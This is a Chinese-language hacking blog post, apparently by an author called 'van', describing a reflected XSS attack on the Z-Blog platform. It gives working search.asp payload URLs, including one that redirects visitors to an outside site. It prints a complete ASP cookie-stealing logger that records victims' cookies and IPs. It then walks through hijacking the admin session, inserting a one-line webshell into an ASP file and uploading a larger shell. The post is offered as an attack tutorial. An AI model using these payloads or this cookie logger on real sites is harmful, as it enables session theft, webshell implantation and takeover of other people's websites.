高级xss通杀zblog所有版本

作者:van

Blog:www.ghostvan.cn

测试环境 Vmware  ,  z-blog1.8

影响版本 通杀

被动式攻击 zblog XSS 最新可用.

为了原创,出血了,看了一下,都几个月了,还没补,官方也有此洞.
我们下一个全新版本的zblog
测试xss
哎,官方还没补!
下面讲利用.
先给出攻击语句

http://www.*****.com/search.asp?q=/**/”><img%20src=javascript:alert(“van”)%20<”

http://www.*****.com/search.asp?q=/**/”><img%20src=javascript:window.location=”http://www.ghostvan.cn”%20<”

有了 XSS能做什么? 这可就多了   能做蠕虫  能挂马  能盗取 cookie 能构造备份语句..

今天讲XSS盗取cookies

代码:

Get.asp
<%
dim getcookie
dim mytime
dim str

getcookie=Request.QueryString
getip=Request.ServerVariables(“REMOTE_ADDR”)
mytime=now()
set fs=server.CreateObject(“Scripting.FileSystemObject”)
set file=fs.OpenTextFile(server.MapPath(“cookie.txt”),8,True)

str=”<-bof||”& mytime & “||” &getip & “||” & getcookie & “||eof->”

file.writeline(str)
file.close
set file=nothing
set fs=nothing

response.write ” ”
response.end
%>

第一次没偷出来,然后跟叶子(Blog:www.yezishell.cn)商量了一下,
原来是地址出错,哈哈.
第二次
嘿嘿,cookies出来了!
然后找一个能改cookies的浏览器,地址输入后台管理页面
http://localhost/admin/admin_default.asp
然后访问,
返回错误,然后将cookies粘贴进去,点击修改
嘿嘿,一个z-Blog就这样拿下了.
进去之后,
随便点开一个asp文件
加一句话,保存.连接
成功,上大马.
教程到此为止!

谢谢!

Van原创,转载请注明出处!

评论关闭。